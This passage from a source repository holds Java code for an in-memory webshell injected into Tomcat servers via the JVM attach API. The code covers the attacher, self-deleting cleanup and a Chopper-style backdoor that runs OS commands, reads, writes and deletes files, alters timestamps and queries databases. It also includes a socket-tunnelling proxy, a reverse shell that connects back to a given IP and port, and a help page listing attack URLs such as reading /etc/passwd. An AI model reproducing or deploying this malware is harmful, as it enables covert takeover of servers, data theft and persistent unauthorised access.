134 | 	}
135 | 
136 | 	static byte[] mergeByteArray(byte[]... byteArray) {
137 | 		int totalLength = 0;
138 | 		for (int i = 0; i < byteArray.length; i++) {
139 | 			if (byteArray[i] == null) {
140 | 				continue;
141 | 			}
142 | 			totalLength += byteArray[i].length;
143 | 		}
144 | 
145 | 		byte[] result = new byte[totalLength];
146 | 		int cur = 0;
147 | 		for (int i = 0; i < byteArray.length; i++) {
148 | 			if (byteArray[i] == null) {
149 | 				continue;
150 | 			}
151 | 			System.arraycopy(byteArray[i], 0, result, cur, byteArray[i].length);
152 | 			cur += byteArray[i].length;
153 | 		}
154 | 
155 | 		return result;
156 | 	}
157 | 
158 | 	public static void clear(String currentPath) throws Exception {
159 | 		Thread clearThread = new Thread() {
160 | 			String currentPath = Agent.currentPath;
161 | 
162 | 			public void run() {
163 | 				try {
164 | 					Thread.sleep(5000);
165 | 					String injectFile = currentPath + "inject.jar";
166 | 					String agentFile = currentPath + "agent.jar";
167 | 					new File(injectFile).getCanonicalFile().delete();
168 | 					String OS = System.getProperty("os.name").toLowerCase();
169 | 					if (OS.indexOf("windows") >= 0) {
170 | 						try {
171 | 							unlockFile(currentPath);
172 | 						} catch (Exception e) {
173 | 							e.printStackTrace();
174 | 						}
175 | 					}
176 | 					new File(agentFile).delete();
177 | 				} catch (Exception e) {
178 | 					//pass
179 | 				}
180 | 			}
181 | 		};
182 | 		clearThread.start();
183 | 
184 | 	}
185 | 
186 | 	public static void unlockFile(String currentPath) throws Exception {
187 | 		String exePath = currentPath + "foreceDelete.exe";
188 | 		InputStream is = Agent.class.getClassLoader().getResourceAsStream("other/forcedelete.exe");
189 | 		FileOutputStream fos = new FileOutputStream(new File(exePath).getCanonicalPath());
190 | 		byte[] bytes = new byte[1024 * 100];
191 | 		int num = 0;
192 | 		while ((num = is.read(bytes)) != -1) {
193 | 			fos.write(bytes, 0, num);
194 | 			fos.flush();
195 | 		}
196 | 		fos.close();
197 | 		is.close();
198 | 		Process process = java.lang.Runtime.getRuntime().exec(exePath + " " + getCurrentPid());
199 | 		try {
200 | 			process.waitFor();
201 | 		} catch (InterruptedException e) {
202 | 			// TODO Auto-generated catch block
203 | 			e.printStackTrace();
204 | 		}
205 | 		new File(exePath).delete();
206 | 	}
207 | 
208 | 	public static String getCurrentPid() {
209 | 		RuntimeMXBean runtimeMXBean = ManagementFactory.getRuntimeMXBean();
210 | 		return runtimeMXBean.getName().split("@")[0];
211 | 	}
212 | 
213 | 	public static void initLoad() throws Exception {
214 | 		try {
215 | 			MBeanServer beanServer = ManagementFactory.getPlatformMBeanServer();
216 | 			Set<ObjectName> objectNames = beanServer.queryNames(new ObjectName("*:type=Connector,*"),
217 | 					Query.match(Query.attr("protocol"), Query.value("HTTP/1.1")));
218 | 			//String host = InetAddress.getLocalHost().getHostAddress();
219 | 			String host = "127.0.0.1";
220 | 			String port = objectNames.iterator().next().getKeyProperty("port");
221 | 			String url = "http" + "://" + host + ":" + port;
222 | 			String[] models = new String[] { "model=exec&cmd=whoami", "model=proxy", "model=chopper", "model=list&path=.",
223 | 					"model=urldownload&url=https://www.baidu.com/robots.txt&path=not_exist:/not_exist" };
224 | 			for (String model : models) {
225 | 				String address = url + "/robots.txt?" + "pass_the_world=" + Agent.password + "&" + model;
226 | 				openUrl(address);
227 | 			}
228 | 		}
229 | 		catch(Exception e)
230 | 		{
231 | 			//pass
232 | 		}
233 | 	}
234 | 
235 | 	public static void openUrl(String address) throws Exception {
236 | 		URL url = new URL(address);
237 | 		HttpURLConnection urlcon = (HttpURLConnection) url.openConnection();
238 | 		urlcon.connect(); // 获取连接
239 | 		InputStream is = urlcon.getInputStream();
240 | 		BufferedReader buffer = new BufferedReader(new InputStreamReader(is));
241 | 		StringBuffer bs = new StringBuffer();
242 | 		String l = null;
243 | 		while ((l = buffer.readLine()) != null) {
244 | 			bs.append(l).append("\n");
245 | 		}
246 | 	}
247 | }
248 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/src/net/rebeyond/memshell/Attach.java:
--------------------------------------------------------------------------------
 1 | //
 2 | // Source code recreated from a .class file by IntelliJ IDEA
 3 | // (powered by Fernflower decompiler)
 4 | //
 5 | 
 6 | package net.rebeyond.memshell;
 7 | 
 8 | import com.sun.tools.attach.VirtualMachine;
 9 | import com.sun.tools.attach.VirtualMachineDescriptor;
10 | import java.io.File;
11 | import java.util.Iterator;
12 | import java.util.List;
13 | 
14 | public class Attach {
15 | 	public Attach() {
16 | 	}
17 | 
18 | 	public static void main(String[] args) throws Exception {
19 | 		if (args.length != 1) {
20 | 			System.out.println("Usage:java -jar inject.jar password");
21 | 		} else {
22 | 			VirtualMachine vm = null;
23 | 			List<VirtualMachineDescriptor> vmList = null;
24 | 			String password = args[0];
25 | 			String currentPath = Attach.class.getProtectionDomain().getCodeSource().getLocation().getPath();
26 | 			currentPath = currentPath.substring(0, currentPath.lastIndexOf("/") + 1);
27 | 			String agentFile = currentPath + "agent.jar";
28 | 			agentFile = (new File(agentFile)).getCanonicalPath();
29 | 			String agentArgs = currentPath;
30 | 			if (!password.equals("") || password != null) {
31 | 				agentArgs = currentPath + "^" + password;
32 | 			}
33 | 
34 | 			while(true) {
35 | 				while(true) {
36 | 					try {
37 | 						vmList = VirtualMachine.list();
38 | 						if (vmList.size() > 0) {
39 | 							Iterator var7 = vmList.iterator();
40 | 
41 | 							while(var7.hasNext()) {
42 | 								VirtualMachineDescriptor vmd = (VirtualMachineDescriptor)var7.next();
43 | 								if (vmd.displayName().indexOf("catalina") >= 0 || vmd.displayName().equals("")) {
44 | 									vm = VirtualMachine.attach(vmd);
45 | 									if (!vmd.displayName().equals("") || vm.getSystemProperties().containsKey("catalina.home")) {
46 | 										System.out.println("[+]OK.i find a jvm.");
47 | 										Thread.sleep(1000L);
48 | 										if (null != vm) {
49 | 											vm.loadAgent(agentFile, agentArgs);
50 | 											System.out.println("[+]memeShell is injected.");
51 | 											vm.detach();
52 | 											return;
53 | 										}
54 | 									}
55 | 								}
56 | 							}
57 | 
58 | 							Thread.sleep(3000L);
59 | 						}
60 | 					} catch (Exception var9) {
61 | 						var9.printStackTrace();
62 | 					}
63 | 				}
64 | 			}
65 | 		}
66 | 	}
67 | }
68 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/src/net/rebeyond/memshell/Evaluate.java:
--------------------------------------------------------------------------------
  1 | package net.rebeyond.memshell;
  2 | 
  3 | 
  4 | import java.io.BufferedInputStream;
  5 | import java.io.BufferedReader;
  6 | import java.io.BufferedWriter;
  7 | import java.io.File;
  8 | import java.io.FileInputStream;
  9 | import java.io.FileOutputStream;
 10 | import java.io.IOException;
 11 | import java.io.InputStream;
 12 | import java.io.InputStreamReader;
 13 | import java.io.OutputStreamWriter;
 14 | import java.io.PrintWriter;
 15 | import java.net.HttpURLConnection;
 16 | import java.net.URL;
 17 | import java.sql.Connection;
 18 | import java.sql.DriverManager;
 19 | import java.sql.ResultSet;
 20 | import java.sql.ResultSetMetaData;
 21 | import java.sql.Statement;
 22 | import java.text.SimpleDateFormat;
 23 | 
 24 | 
 25 | import javax.servlet.ServletOutputStream;
 26 | import javax.servlet.ServletRequest;
 27 | import javax.servlet.ServletResponse;
 28 | 
 29 | import net.rebeyond.memshell.redefine.MyRequest;
 30 | import net.rebeyond.memshell.redefine.MyResponse;
 31 | import net.rebeyond.memshell.redefine.MyServletContext;
 32 | import net.rebeyond.memshell.redefine.MyServletOutputStream;
 33 | 
 34 | public class Evaluate  {
 35 | 
 36 | 	private static final long serialVersionUID = 1L;
 37 | 	
 38 | 	String Pwd = "023";
 39 | 	String cs = "UTF-8";
 40 | 	
 41 | 	String EC(String s) throws Exception {
 42 | 		return new String(s.getBytes("ISO-8859-1"),cs);
 43 | 	}
 44 | 
 45 | 	Connection GC(String s) throws Exception {
 46 | 		String[] x = s.trim().split("\r\n");
 47 | 		Class.forName(x[0].trim());
 48 | 		if(x[1].indexOf("jdbc:oracle")!=-1){
 49 | 			return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);
 50 | 		}else{
 51 | 			Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);
 52 | 			if (x.length > 4) {
 53 | 				c.setCatalog(x[4]);
 54 | 			}
 55 | 			return c;
 56 | 		}
 57 | 	}
 58 | 
 59 | 	void AA(StringBuffer sb) throws Exception {
 60 | 		File r[] = File.listRoots();
 61 | 		for (int i = 0; i < r.length; i++) {
 62 | 			sb.append(r[i].toString().substring(0, 2));
 63 | 		}
 64 | 	}
 65 | 
 66 | 	void BB(String s, StringBuffer sb) throws Exception {
 67 | 		File oF = new File(s), l[] = oF.listFiles();
 68 | 		String sT, sQ, sF = "";
 69 | 		java.util.Date dt;
 70 | 		SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
 71 | 		for (int i = 0; i < l.length; i++) {
 72 | 			dt = new java.util.Date(l[i].lastModified());
 73 | 			sT = fm.format(dt);
 74 | 			sQ = l[i].canRead() ? "R" : "";
 75 | 			sQ += l[i].canWrite() ? " W" : "";
 76 | 			if (l[i].isDirectory()) {
 77 | 				sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ + "\n");
 78 | 			} else {
 79 | 				sF+=l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"+ sQ + "\n";
 80 | 			}
 81 | 		}
 82 | 		sb.append(sF);
 83 | 	}
 84 | 
 85 | 	void EE(String s) throws Exception {
 86 | 		File f = new File(s);
 87 | 		if (f.isDirectory()) {
 88 | 			File x[] = f.listFiles();
 89 | 			for (int k = 0; k < x.length; k++) {
 90 | 				if (!x[k].delete()) {
 91 | 					EE(x[k].getPath());
 92 | 				}
 93 | 			}
 94 | 		}
 95 | 		f.delete();
 96 | 	}
 97 | 
 98 | 	void FF(String s, ServletResponse r) throws Exception {
 99 | 		int n;
100 | 		byte[] b = new byte[512];
101 | 		//r.reset();
102 | 		MyResponse.reset(r);
103 | 		//ServletOutputStream os = r.getOutputStream();
104 | 		Object os = MyResponse.getOutputStream(r);
105 | 		BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
106 | 		//os.write(("->" + "|").getBytes(), 0, 3);
107 | 		MyServletOutputStream.write(os,("->" + "|").getBytes(), 0, 3);
108 | 		while ((n = is.read(b, 0, 512)) != -1) {
109 | 			MyServletOutputStream.write(os,b, 0, n);
110 | 		}
111 | 		MyServletOutputStream.write(os,("|" + "<-").getBytes(), 0, 3);
112 | 		//os.close();
113 | 		MyServletOutputStream.close(os);
114 | 		is.close();
115 | 	}
116 | 
117 | 	void GG(String s, String d) throws Exception {
118 | 		String h = "0123456789ABCDEF";
119 | 		File f = new File(s);
120 | 		f.createNewFile();
121 | 		FileOutputStream os = new FileOutputStream(f);
122 | 		for (int i = 0; i < d.length(); i += 2) {
123 | 			os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1))));
124 | 		}
125 | 		os.close();
126 | 	}
127 | 
128 | 	void HH(String s, String d) throws Exception {
129 | 		File sf = new File(s), df = new File(d);
130 | 		if (sf.isDirectory()) {
131 | 			if (!df.exists()) {
132 | 				df.mkdir();
133 | 			}
134 | 			File z[] = sf.listFiles();
135 | 			for (int j = 0; j < z.length; j++) {
136 | 				HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());
137 | 			}
138 | 		} else {
139 | 			FileInputStream is = new FileInputStream(sf);
140 | 			FileOutputStream os = new FileOutputStream(df);
141 | 			int n;
142 | 			byte[] b = new byte[512];
143 | 			while ((n = is.read(b, 0, 512)) != -1) {
144 | 				os.write(b, 0, n);
145 | 			}
146 | 			is.close();
147 | 			os.close();
148 | 		}
149 | 	}
150 | 
151 | 	void II(String s, String d) throws Exception {
152 | 		File sf = new File(s), df = new File(d);
153 | 		sf.renameTo(df);
154 | 	}
155 | 
156 | 	void JJ(String s) throws Exception {
157 | 		File f = new File(s);
158 | 		f.mkdir();
159 | 	}
160 | 
161 | 	void KK(String s, String t) throws Exception {
162 | 		File f = new File(s);
163 | 		SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
164 | 		java.util.Date dt = fm.parse(t);
165 | 		f.setLastModified(dt.getTime());
166 | 	}
167 | 
168 | 	void LL(String s, String d) throws Exception {
169 | 		URL u = new URL(s);
170 | 		int n = 0;
171 | 		FileOutputStream os = new FileOutputStream(d);
172 | 		HttpURLConnection h = (HttpURLConnection) u.openConnection();
173 | 		InputStream is = h.getInputStream();
174 | 		byte[] b = new byte[512];
175 | 		while ((n = is.read(b)) != -1) {
176 | 			os.write(b, 0, n);
177 | 		}
178 | 		os.close();
179 | 		is.close();
180 | 		h.disconnect();
181 | 	}
182 | 
183 | 	void MM(InputStream is, StringBuffer sb) throws Exception {
184 | 		String l;
185 | 		BufferedReader br = new BufferedReader(new InputStreamReader(is));
186 | 		while ((l = br.readLine()) != null) {
187 | 			sb.append(l + "\r\n");
188 | 		}
189 | 	}
190 | 
191 | 	void NN(String s, StringBuffer sb) throws Exception {
192 | 		Connection c = GC(s);
193 | 		ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();
194 | 		while (r.next()) {
195 | 			sb.append(r.getString(1) + "\t");
196 | 		}
197 | 		r.close();
198 | 		c.close();
199 | 	}
200 | 
201 | 	void OO(String s, StringBuffer sb) throws Exception {
202 | 		Connection c = GC(s);
203 | 		String[] x = s.trim().split("\r\n");
204 | 		ResultSet r = c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null, "%", new String[]{"TABLE"});
205 | 		while (r.next()) {
206 | 			sb.append(r.getString("TABLE_NAME") + "\t");
207 | 		}
208 | 		r.close();
209 | 		c.close();
210 | 	}
211 | 
212 | 	void PP(String s, StringBuffer sb) throws Exception {
213 | 		String[] x = s.trim().split("\r\n");
214 | 		Connection c = GC(s);
215 | 		Statement m = c.createStatement(1005, 1007);
216 | 		ResultSet r = m.executeQuery("select * from " + x[x.length-1]);
217 | 		ResultSetMetaData d = r.getMetaData();
218 | 		for (int i = 1; i <= d.getColumnCount(); i++) {
219 | 			sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)+ ")\t");
220 | 		}
221 | 		r.close();
222 | 		m.close();
223 | 		c.close();
224 | 	}
225 | 
226 | 	void QQ(String cs, String s, String q, StringBuffer sb,String p) throws Exception {
227 | 		Connection c = GC(s);
228 | 		Statement m = c.createStatement(1005, 1008);
229 | 		BufferedWriter bw = null;
230 | 		try {
231 | 			ResultSet r = m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q);
232 | 			ResultSetMetaData d = r.getMetaData();
233 | 			int n = d.getColumnCount();
234 | 			for (int i = 1; i <= n; i++) {
235 | 				sb.append(d.getColumnName(i) + "\t|\t");
236 | 			}
237 | 			sb.append("\r\n");
238 | 			if(q.indexOf("--f:")!=-1){
239 | 				File file = new File(p);
240 | 				if(q.indexOf("-to:")==-1){
241 | 					file.mkdir();
242 | 				}
243 | 				bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:") + 4,q.length()).trim()),true),cs));
244 | 			}
245 | 			while (r.next()) {
246 | 				for (int i = 1; i <= n; i++) {
247 | 					if(q.indexOf("--f:")!=-1){
248 | 						bw.write(r.getObject(i)+""+"\t");
249 | 						bw.flush();
250 | 					}else{
251 | 						sb.append(r.getObject(i)+"" + "\t|\t");
252 | 					}
253 | 				}
254 | 				if(bw!=null){bw.newLine();}
255 | 				sb.append("\r\n");
256 | 			}
257 | 			r.close();
258 | 			if(bw!=null){bw.close();}
259 | 		} catch (Exception e) {
260 | 			sb.append("Result\t|\t\r\n");
261 | 			try {
262 | 				m.executeUpdate(q);
263 | 				sb.append("Execute Successfully!\t|\t\r\n");
264 | 			} catch (Exception ee) {
265 | 				sb.append(ee.toString() + "\t|\t\r\n");
266 | 			}
267 | 		}
268 | 		m.close();
269 | 		c.close();
270 | 	}
271 | 	
272 | 	public void doGet(ServletRequest request, ServletResponse response)
273 | 			throws Exception {
274 | 		doPost(request, response);
275 | 	}
276 | 
277 | 	public void doPost(ServletRequest request, ServletResponse response)throws Exception {
278 | 		//cs = request.getParameter("z0") != null ? request.getParameter("z0")+ "":cs;
279 | 		cs = MyRequest.getParameter(request, "z0") != null ? MyRequest.getParameter(request, "z0") + "":cs;
280 | 		//response.setContentType("text/html");
281 | 		//response.setCharacterEncoding(cs);
282 | 		MyResponse.setContentType(response, "text/html");
283 | 		MyResponse.setCharacterEncoding(response,cs);
284 | 		PrintWriter out = MyResponse.getWriter(response);
285 | 		StringBuffer sb = new StringBuffer("");
286 | 		try {
287 | 			String Z = EC(MyRequest.getParameter(request, Pwd) + "");
288 | 			String z1 = EC(MyRequest.getParameter(request, "z1") + "");
289 | 			String z2 = EC(MyRequest.getParameter(request, "z2") + "");
290 | 			sb.append("->" + "|");
291 | 			Object obj=MyRequest.getServletContext(request);
292 | 			String s =MyServletContext.getRealPath(obj,"/");
293 | 			if (Z.equals("A")) {
294 | 				sb.append(s + "\t");
295 | 				if (!s.substring(0, 1).equals("/")) {
296 | 					AA(sb);
297 | 				}
298 | 			} else if (Z.equals("B")) {
299 | 				BB(z1, sb);
300 | 			} else if (Z.equals("C")) {
301 | 				String l = "";
302 | 				BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
303 | 				while ((l = br.readLine()) != null) {
304 | 					sb.append(l + "\r\n");
305 | 				}
306 | 				br.close();
307 | 			} else if (Z.equals("D")) {
308 | 				BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
309 | 				bw.write(z2);
310 | 				bw.close();
311 | 				sb.append("1");
312 | 			} else if (Z.equals("E")) {
313 | 				EE(z1);
314 | 				sb.append("1");
315 | 			} else if (Z.equals("F")) {
316 | 				FF(z1, response);
317 | 			} else if (Z.equals("G")) {
318 | 				GG(z1, z2);
319 | 				sb.append("1");
320 | 			} else if (Z.equals("H")) {
321 | 				HH(z1, z2);
322 | 				sb.append("1");
323 | 			} else if (Z.equals("I")) {
324 | 				II(z1, z2);
325 | 				sb.append("1");
326 | 			} else if (Z.equals("J")) {
327 | 				JJ(z1);
328 | 				sb.append("1");
329 | 			} else if (Z.equals("K")) {
330 | 				KK(z1, z2);
331 | 				sb.append("1");
332 | 			} else if (Z.equals("L")) {
333 | 				LL(z1, z2);
334 | 				sb.append("1");
335 | 			} else if (Z.equals("M")) {
336 | 				String[] c = { z1.substring(2), z1.substring(0, 2), z2 };
337 | 				Process p = Runtime.getRuntime().exec(c);
338 | 				MM(p.getInputStream(), sb);
339 | 				MM(p.getErrorStream(), sb);
340 | 			} else if (Z.equals("N")) {
341 | 				NN(z1, sb);
342 | 			} else if (Z.equals("O")) {
343 | 				OO(z1, sb);
344 | 			} else if (Z.equals("P")) {
345 | 				PP(z1, sb);
346 | 			} else if (Z.equals("Q")) {
347 | 				QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\", "/")+"images/");
348 | 			}
349 | 		} catch (Exception e) {
350 | 			sb.append("ERROR" + ":// " + e.toString());
351 | 		}
352 | 		sb.append("|" + "<-");
353 | 		out.print(sb.toString());
354 | 	}
355 | 
356 | }


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/src/net/rebeyond/memshell/Proxy.java:
--------------------------------------------------------------------------------
  1 | package net.rebeyond.memshell;
  2 | import java.io.IOException;
  3 | import java.net.InetSocketAddress;
  4 | import java.net.UnknownHostException;
  5 | import java.nio.ByteBuffer;
  6 | import java.nio.channels.SocketChannel;
  7 | 
  8 | import net.rebeyond.memshell.redefine.MyRequest;
  9 | import net.rebeyond.memshell.redefine.MyResponse;
 10 | import net.rebeyond.memshell.redefine.MyServletInputStream;
 11 | import net.rebeyond.memshell.redefine.MyServletOutputStream;
 12 | import net.rebeyond.memshell.redefine.MySession;
 13 | 
 14 | public class Proxy {
 15 | 	public void doProxy(Object request, Object response) throws Exception {
 16 | 		Object httpSession = MyRequest.getSession(request);
 17 | 		String cmd = MyRequest.getHeader(request, "X-CMD");
 18 | 		if (cmd != null) {
 19 | 			MyResponse.setHeader(response, "X-STATUS", "OK");
 20 | 			if (cmd.compareTo("CONNECT") == 0) {
 21 | 				try {
 22 | 					String target = MyRequest.getHeader(request, "X-TARGET");
 23 | 					int port = Integer.parseInt(MyRequest.getHeader(request, "X-PORT"));
 24 | 					SocketChannel socketChannel = SocketChannel.open();
 25 | 					socketChannel.connect(new InetSocketAddress(target, port));
 26 | 					socketChannel.configureBlocking(false);
 27 | 					MySession.setAttribute(httpSession, "socket", socketChannel);
 28 | 					MyResponse.setHeader(response, "X-STATUS", "OK");
 29 | 				} catch (UnknownHostException e) {
 30 | 					System.out.println(e.getMessage());
 31 | 					MyResponse.setHeader(response, "X-ERROR", e.getMessage());
 32 | 					MyResponse.setHeader(response, "X-STATUS", "FAIL");
 33 | 				} catch (IOException e) {
 34 | 					System.out.println(e.getMessage());
 35 | 					MyResponse.setHeader(response, "X-ERROR", e.getMessage());
 36 | 					MyResponse.setHeader(response, "X-STATUS", "FAIL");
 37 | 
 38 | 				}
 39 | 			} else if (cmd.compareTo("DISCONNECT") == 0) {
 40 | 				SocketChannel socketChannel = (SocketChannel) MySession.getAttribute(httpSession, "socket");
 41 | 				try {
 42 | 					socketChannel.socket().close();
 43 | 				} catch (Exception ex) {
 44 | 					System.out.println(ex.getMessage());
 45 | 				}
 46 | 				MySession.invalidate(httpSession);
 47 | 			} else if (cmd.compareTo("READ") == 0) {
 48 | 				SocketChannel socketChannel = (SocketChannel) MySession.getAttribute(httpSession, "socket");
 49 | 				try {
 50 | 					ByteBuffer buf = ByteBuffer.allocate(512);
 51 | 					int bytesRead = socketChannel.read(buf);
 52 | 					// ServletOutputStream so = response.getOutputStream();
 53 | 					Object so = MyResponse.getOutputStream(response);
 54 | 					while (bytesRead > 0) {
 55 | 						// so.write(buf.array(),0,bytesRead);
 56 | 						// so.flush();
 57 | 						MyServletOutputStream.write(so, buf.array(), 0, bytesRead);
 58 | 						MyServletOutputStream.flush(so);
 59 | 						buf.clear();
 60 | 						bytesRead = socketChannel.read(buf);
 61 | 					}
 62 | 					// response.setHeader("X-STATUS", "OK");
 63 | 					MyResponse.setHeader(response, "X-STATUS", "OK");
 64 | 					// so.flush();
 65 | 					// so.close();
 66 | 					MyServletOutputStream.flush(so);
 67 | 					MyServletOutputStream.close(so);
 68 | 
 69 | 				} catch (Exception e) {
 70 | 					System.out.println(e.getMessage());
 71 | 					MyResponse.setHeader(response, "X-ERROR", e.getMessage());
 72 | 					MyResponse.setHeader(response, "X-STATUS", "FAIL");
 73 | 					// socketChannel.socket().close();
 74 | 				}
 75 | 
 76 | 			} else if (cmd.compareTo("FORWARD") == 0) {
 77 | 				SocketChannel socketChannel = (SocketChannel) MySession.getAttribute(httpSession, "socket");
 78 | 				try {
 79 | 
 80 | 					int readlen = MyRequest.getContentLength(request);
 81 | 					byte[] buff = new byte[readlen];
 82 | 					// request.getInputStream().read(buff, 0, readlen);
 83 | 					Object ins = MyRequest.getInputStream(request);
 84 | 					MyServletInputStream.read(ins, buff, 0, readlen);
 85 | 					ByteBuffer buf = ByteBuffer.allocate(readlen);
 86 | 					buf.clear();
 87 | 					buf.put(buff);
 88 | 					buf.flip();
 89 | 
 90 | 					while (buf.hasRemaining()) {
 91 | 						socketChannel.write(buf);
 92 | 					}
 93 | 					MyResponse.setHeader(response, "X-STATUS", "OK");
 94 | 					// response.getOutputStream().close();
 95 | 
 96 | 				} catch (Exception e) {
 97 | 					System.out.println(e.getMessage());
 98 | 					MyResponse.setHeader(response, "X-ERROR", e.getMessage());
 99 | 					MyResponse.setHeader(response, "X-STATUS", "FAIL");
100 | 					socketChannel.socket().close();
101 | 				}
102 | 			}
103 | 		} else {
104 | 			// PrintWriter o = response.getWriter();
105 | 			// out.print("Georg says, 'All seems fine'");
106 | 			MyResponse.getWriter(response).print("Georg says, 'All seems fine'");
107 | 		}
108 | 	}
109 | }
110 | 


--------------------------------------------------------------------------------
/MemShellForJava/字节码增强型/retransform字节码/linux_inject/memShell/src/net/rebeyond/memshell/Shell.java:
--------------------------------------------------------------------------------
  1 | package net.rebeyond.memshell;
  2 | import java.io.BufferedReader;
  3 | import java.io.BufferedWriter;
  4 | import java.io.DataInputStream;
  5 | import java.io.DataOutputStream;
  6 | import java.io.File;
  7 | import java.io.FileInputStream;
  8 | import java.io.FileNotFoundException;
  9 | import java.io.FileOutputStream;
 10 | import java.io.FileReader;
 11 | import java.io.IOException;
 12 | import java.io.InputStream;
 13 | import java.io.InputStreamReader;
 14 | import java.io.OutputStream;
 15 | import java.io.OutputStreamWriter;
 16 | import java.io.PrintWriter;
 17 | import java.lang.reflect.Method;
 18 | import java.net.HttpURLConnection;
 19 | import java.net.Socket;
 20 | import java.net.URL;
 21 | import java.net.URLConnection;
 22 | import java.security.cert.CertificateException;
 23 | import java.util.Base64;
 24 | 
 25 | import javax.net.ssl.HostnameVerifier;
 26 | import javax.net.ssl.HttpsURLConnection;
 27 | import javax.net.ssl.SSLContext;
 28 | import javax.net.ssl.SSLSession;
 29 | import javax.net.ssl.TrustManager;
 30 | import javax.net.ssl.X509TrustManager;
 31 | import javax.security.cert.X509Certificate;
 32 | import javax.servlet.ServletContext;
 33 | import javax.servlet.ServletException;
 34 | import javax.servlet.ServletOutputStream;
 35 | import javax.servlet.ServletRequest;
 36 | import javax.servlet.ServletResponse;
 37 | import javax.servlet.http.HttpSession;
 38 | 
 39 | public class Shell {
 40 | 
 41 | 	public static String execute(String cmd) throws Exception {
 42 | 		String result = "";
 43 | 		if (cmd != null && cmd.length() > 0) {
 44 | 
 45 | 			Process p = Runtime.getRuntime().exec(cmd);
 46 | 			OutputStream os = p.getOutputStream();
 47 | 			InputStream in = p.getInputStream();
 48 | 			DataInputStream dis = new DataInputStream(in);
 49 | 			String disr = dis.readLine();
 50 | 			while (disr != null) {
 51 | 				result = result + disr + "\n";
 52 | 				disr = dis.readLine();
 53 | 			}
 54 | 		}
 55 | 		return result;
 56 | 	}
 57 | 
 58 | 	public static String connectBack(String ip, String port) throws Exception {
 59 | 		class StreamConnector extends Thread {
 60 | 			InputStream sp;
 61 | 			OutputStream gh;
 62 | 
 63 | 			StreamConnector(InputStream sp, OutputStream gh) {
 64 | 				this.sp = sp;
 65 | 				this.gh = gh;
 66 | 			}
 67 | 
 68 | 			public void run() {
 69 | 				BufferedReader xp = null;
 70 | 				BufferedWriter ydg = null;
 71 | 				try {
 72 | 					xp = new BufferedReader(new InputStreamReader(this.sp));
 73 | 					ydg = new BufferedWriter(new OutputStreamWriter(this.gh));
 74 | 					char buffer[] = new char[8192];
 75 | 					int length;
 76 | 					while ((length = xp.read(buffer, 0, buffer.length)) > 0) {
 77 | 						ydg.write(buffer, 0, length);
 78 | 						ydg.flush();
 79 | 					}
 80 | 				} catch (Exception e) {
 81 | 				}
 82 | 				try {
 83 | 					if (xp != null)
 84 | 						xp.close();
 85 | 					if (ydg != null)
 86 | 						ydg.close();
 87 | 				} catch (Exception e) {
 88 | 				}
 89 | 			}
 90 | 		}
 91 | 		try {
 92 | 			String ShellPath;
 93 | 			if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
 94 | 				ShellPath = new String("/bin/sh");
 95 | 			} else {
 96 | 				ShellPath = new String("cmd.exe");
 97 | 			}
 98 | 
 99 | 			Socket socket = new Socket(ip, Integer.parseInt(port));
100 | 			Process process = Runtime.getRuntime().exec(ShellPath);
101 | 			(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start();
102 | 			(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start();
103 | 			return "Successful!";
104 | 		} catch (Exception e) {
105 | 			return e.getMessage();
106 | 		}
107 | 	}
108 | 
109 | 	public static String help() {
110 | 		return "Webshell in Memory:\n\n" + "Usage:\n" + "anyurl?pwd=pass //show this help page.\n"
111 | 				+ "anyurl?pwd=pass&model=exec&cmd=whoami  //run os command.\n"
112 | 				+ "anyurl?pwd=pass&model=connectback&ip=8.8.8.8&port=51 //reverse a shell back to 8.8.8.8 on port 51.\n"
113 | 				+ "anyurl?pwd=pass&model=urldownload&url=http://xxx.com/test.pdf&path=/tmp/test.pdf //download a remote file via the victim's network directly.\n"
114 | 				+ "anyurl?pwd=pass&model=list[del|show]&path=/etc/passwd  //list,delete,show the specified path or file.\n"
115 | 				+ "anyurl?pwd=pass&model=download&path=/etc/passwd  //download the specified file on the victim's disk.\n"
116 | 				+ "anyurl?pwd=pass&model=upload&path=/tmp/a.elf&content=this_is_content[&type=b]   //upload a text file or a base64 encoded binary file to the victim's disk.\n"
117 | 				+ "anyurl?pwd=pass&model=proxy  //start a socks proxy server on the victim.\n"
118 | 				+ "anyurl?pwd=pass&model=chopper  //start a chopper server agent on the victim.\n\n"
119 | 				+ "For learning exchanges only, do not use for illegal purposes.by rebeyond.\n";
120 | 	}
121 | 
122 | 	public static String list(String path) {
123 | 		String result = "";
124 | 		File f = new File(path);
125 | 		if (f.isDirectory()) {
126 | 			for (File temp : f.listFiles()) {
127 | 				if (temp.isFile()) {
